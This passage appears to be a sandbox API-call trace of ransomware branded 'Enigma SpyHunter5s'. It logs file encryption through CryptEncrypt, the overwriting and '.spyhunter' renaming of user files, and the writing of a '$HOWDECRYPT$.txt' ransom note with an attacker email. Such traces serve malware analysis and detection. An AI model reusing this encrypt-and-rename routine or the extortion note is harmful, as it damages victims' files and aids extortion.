dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.074] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.074] WriteFile (in: hFile=0x178, lpBuffer=0x248ec3b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ed64, lpOverlapped=0x0 | out: lpBuffer=0x248ec3b*, lpNumberOfBytesWritten=0x248ed64*=0x127, lpOverlapped=0x0) returned 1 [0156.075] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.075] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ed64, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ed64*=0x2ac, lpOverlapped=0x0) returned 1 [0156.075] CloseHandle (hObject=0x178) returned 1 [0156.075] GetProcessHeap () returned 0x2c0000 [0156.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4c3d8 | out: hHeap=0x2c0000) returned 1 [0156.075] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ed00 | out: pbBuffer=0x248ed00) returned 1 [0156.076] GetProcessHeap () returned 0x2c0000 [0156.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.076] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ecf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ecf8*=0x30) returned 1 [0156.076] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_contactprefs_2_f230e11936b7d740a008ffc660e83c71.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.077] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat") returned 134 [0156.077] StrStrW (lpFirst="Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat", lpSrch=".txt") returned 0x0 [0156.077] GetProcessHeap () returned 0x2c0000 [0156.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.077] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ecbc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ecbc*=0x104, lpOverlapped=0x0) returned 1 [0156.078] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffefc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.078] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x248ecbc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ecbc*=0x104, lpOverlapped=0x0) returned 1 [0156.078] GetProcessHeap () returned 0x2c0000 [0156.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.078] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.078] WriteFile (in: hFile=0x178, lpBuffer=0x248ecfc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ecbc, lpOverlapped=0x0 | out: lpBuffer=0x248ecfc*, lpNumberOfBytesWritten=0x248ecbc*=0x4, lpOverlapped=0x0) returned 1 [0156.078] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ecbc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ecbc*=0x30, lpOverlapped=0x0) returned 1 [0156.078] CloseHandle (hObject=0x178) returned 1 [0156.078] GetProcessHeap () returned 0x2c0000 [0156.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.079] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat.spyhunter") returned 144 [0156.079] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_contactprefs_2_f230e11936b7d740a008ffc660e83c71.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_contactprefs_2_f230e11936b7d740a008ffc660e83c71.dat.spyhunter")) returned 1 [0156.123] GetProcessHeap () returned 0x2c0000 [0156.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.128] GetProcessHeap () returned 0x2c0000 [0156.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.128] GetProcessHeap () returned 0x2c0000 [0156.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc4698 | out: hHeap=0x2c0000) returned 1 [0156.128] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\groove\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.129] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.129] WriteFile (in: hFile=0x178, lpBuffer=0x248ec33*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ed5c, lpOverlapped=0x0 | out: lpBuffer=0x248ec33*, lpNumberOfBytesWritten=0x248ed5c*=0x127, lpOverlapped=0x0) returned 1 [0156.140] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.140] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ed5c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ed5c*=0x2ac, lpOverlapped=0x0) returned 1 [0156.140] CloseHandle (hObject=0x178) returned 1 [0156.140] GetProcessHeap () returned 0x2c0000 [0156.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f45728 | out: hHeap=0x2c0000) returned 1 [0156.140] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\User\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\groove\\user\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.141] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.141] WriteFile (in: hFile=0x178, lpBuffer=0x248ec2f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ed58, lpOverlapped=0x0 | out: lpBuffer=0x248ec2f*, lpNumberOfBytesWritten=0x248ed58*=0x127, lpOverlapped=0x0) returned 1 [0156.142] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.142] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ed58, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ed58*=0x2ac, lpOverlapped=0x0) returned 1 [0156.142] CloseHandle (hObject=0x178) returned 1 [0156.142] GetProcessHeap () returned 0x2c0000 [0156.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4c1c8 | out: hHeap=0x2c0000) returned 1 [0156.143] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\Groove\\System\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\groove\\system\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.144] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.144] WriteFile (in: hFile=0x178, lpBuffer=0x248ec2b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ed54, lpOverlapped=0x0 | out: lpBuffer=0x248ec2b*, lpNumberOfBytesWritten=0x248ed54*=0x127, lpOverlapped=0x0) returned 1 [0156.146] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.146] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ed54, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ed54*=0x2ac, lpOverlapped=0x0) returned 1 [0156.147] CloseHandle (hObject=0x178) returned 1 [0156.147] GetProcessHeap () returned 0x2c0000 [0156.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4b250 | out: hHeap=0x2c0000) returned 1 [0156.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.148] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.148] WriteFile (in: hFile=0x178, lpBuffer=0x248ec27*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ed50, lpOverlapped=0x0 | out: lpBuffer=0x248ec27*, lpNumberOfBytesWritten=0x248ed50*=0x127, lpOverlapped=0x0) returned 1 [0156.148] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.148] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ed50, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ed50*=0x2ac, lpOverlapped=0x0) returned 1 [0156.149] CloseHandle (hObject=0x178) returned 1 [0156.149] GetProcessHeap () returned 0x2c0000 [0156.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f39418 | out: hHeap=0x2c0000) returned 1 [0156.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.187] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.187] WriteFile (in: hFile=0x9c, lpBuffer=0x248ec23*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ed4c, lpOverlapped=0x0 | out: lpBuffer=0x248ec23*, lpNumberOfBytesWritten=0x248ed4c*=0x127, lpOverlapped=0x0) returned 1 [0156.188] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.188] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ed4c*=0x2ac, lpOverlapped=0x0) returned 1 [0156.193] CloseHandle (hObject=0x9c) returned 1 [0156.193] GetProcessHeap () returned 0x2c0000 [0156.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2ae98 | out: hHeap=0x2c0000) returned 1 [0156.193] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ece8 | out: pbBuffer=0x248ece8) returned 1 [0156.193] GetProcessHeap () returned 0x2c0000 [0156.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.193] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248ece0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248ece0*=0x30) returned 1 [0156.193] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\06_pictures_rated_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0156.197] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl") returned 135 [0156.197] StrStrW (lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch=".txt") returned 0x0 [0156.197] GetProcessHeap () returned 0x2c0000 [0156.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0156.197] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eca4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248eca4*=0x311, lpOverlapped=0x0) returned 1 [0156.208] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffcef, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.208] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x311, lpNumberOfBytesWritten=0x248eca4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248eca4*=0x311, lpOverlapped=0x0) returned 1 [0156.208] GetProcessHeap () returned 0x2c0000 [0156.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0156.209] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.209] WriteFile (in: hFile=0x9c, lpBuffer=0x248ece4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eca4, lpOverlapped=0x0 | out: lpBuffer=0x248ece4*, lpNumberOfBytesWritten=0x248eca4*=0x4, lpOverlapped=0x0) returned 1 [0156.209] WriteFile (in: hFile=0x9c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eca4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248eca4*=0x30, lpOverlapped=0x0) returned 1 [0156.209] CloseHandle (hObject=0x9c) returned 1 [0156.209] GetProcessHeap () returned 0x2c0000 [0156.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.209] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl.spyhunter") returned 145 [0156.209] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\06_pictures_rated_4_or_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\06_Pictures_rated_4_or_5_stars.wpl.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\06_pictures_rated_4_or_5_stars.wpl.spyhunter")) returned 1 [0156.210] GetProcessHeap () returned 0x2c0000 [0156.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.210] GetProcessHeap () returned 0x2c0000 [0156.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.210] GetProcessHeap () returned 0x2c0000 [0156.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc4138 | out: hHeap=0x2c0000) returned 1 [0156.210] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ece8 | out: pbBuffer=0x248ece8) returned 1 [0156.210] GetProcessHeap () returned 0x2c0000 [0156.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.210] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248ece0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248ece0*=0x30) returned 1 [0156.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\04_music_played_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c 